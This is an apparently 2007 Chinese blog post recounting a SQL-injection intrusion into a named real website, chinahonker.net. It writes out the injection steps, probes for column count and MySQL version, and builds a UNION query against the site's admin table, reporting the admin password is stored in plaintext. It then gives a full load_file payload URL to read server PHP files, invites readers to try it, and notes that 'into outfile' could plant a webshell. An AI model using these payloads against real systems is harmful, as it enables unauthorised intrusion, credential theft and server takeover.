对中国红客联盟的一次测试

文章作者:amxku

晚上无聊,在网上瞎砍
无意中发现看到中国红客联盟有一个注入点,反正无聊,看看

http://www.chinahonker.net/down/show.php?id=21
首先'看了下,有问题,继续and 1=1 ,and 1=2,真的有注入

1.jpg - 大小: 64.33 KB - 尺寸: 694 x 577 - 点击打开新窗口浏览全图

2.jpg - 大小: 29.65 KB - 尺寸: 442 x 362 - 点击打开新窗口浏览全图

看一下MYSQL的版本
如果版本是4以上的话 就支持UNION查询方便多了
输入and ord(mid(version(),1,1))>51
4.jpg - 大小: 60.34 KB - 尺寸: 575 x 590 - 点击打开新窗口浏览全图

正常,哈哈,MYSQL的版本应该是4咯
支持UNION查询方便多了

看有多少个字段
order by 10

3.jpg - 大小: 58.7 KB - 尺寸: 572 x 584 - 点击打开新窗口浏览全图

正常,也就是是大于10的,
再来order by 20,出错了,小于20,再试,19,哈哈,正常了
5.jpg - 大小: 62.66 KB - 尺寸: 606 x 578 - 点击打开新窗口浏览全图

共19个字段

用UNION查询下
命令 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19

6.jpg - 大小: 1.63 KB - 尺寸: 196 x 60 - 点击打开新窗口浏览全图

哈,12,了解

看了下这个套系统的代码,好像在哪里见过的,
防黑网以前就是用的这套系统
如果没有改的话,管理员表是ymdown_user,试试吧
直接加from 表名

7.jpg - 大小: 44.28 KB - 尺寸: 698 x 328 - 点击打开新窗口浏览全图

正常,OK,就是这个表了,注用户名和密码
8.jpg - 大小: 43.36 KB - 尺寸: 616 x 337 - 点击打开新窗口浏览全图

用户名就搞定了,再来试试密码
9.jpg - 大小: 1.88 KB - 尺寸: 168 x 46 - 点击打开新窗口浏览全图

我晕,想不到密码是明文的。晕
哈,差不多注入也就告一段落了
就不在往下进来了
其它这次只是运气好罢了
不过大家可以读取他的PHP文件来分析
随便让他出错就可以爆出路径了
/home/ftp/512j.com/c/n/h/cnhacker/down/show.php
直接把这个地址转为ASCII码后,就可以直接读取了
/home/ftp/512j.com/c/n/h/cnhacker/down/show.php转后就是:
47,104,111,109,101,47,102,116,112,47,53,49,50,106,46,99,111,109,47,99,47,110,47,104,47,99,110,
104,97,99,107,101,114,47,100,111,119,110,47,115,104,111,119,46,112,104,112,

http://www.chinahonker.net/down/show.php?id=21%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(47,104,111,109,101,47,102,116,112,47,53,49,50,106,46,99,111,
109,47,99,47,110,47,104,47,99,110,104,97,99,107,101,114,47,100,111,119,110,47,115,104,111,119,46,
112,104,112)),13,14,15,16,17,18,19

哈,大家可以自己去试一下。
其实得到目录后,因为有了后台的用户名和密码,就可以用into outfile来得到webshell了

没有什么技术,主要写出来,看看大家有没有更好的思路,大家交流。

关键词: 原创 , 入侵

上一篇: mysql的入侵
下一篇: nc.exe

相关文章
访客评论
#1
回复 kiki 2007-01-17, 15:39:51
晕,。。。。。。。。。。
发表评论

评论内容 (必填):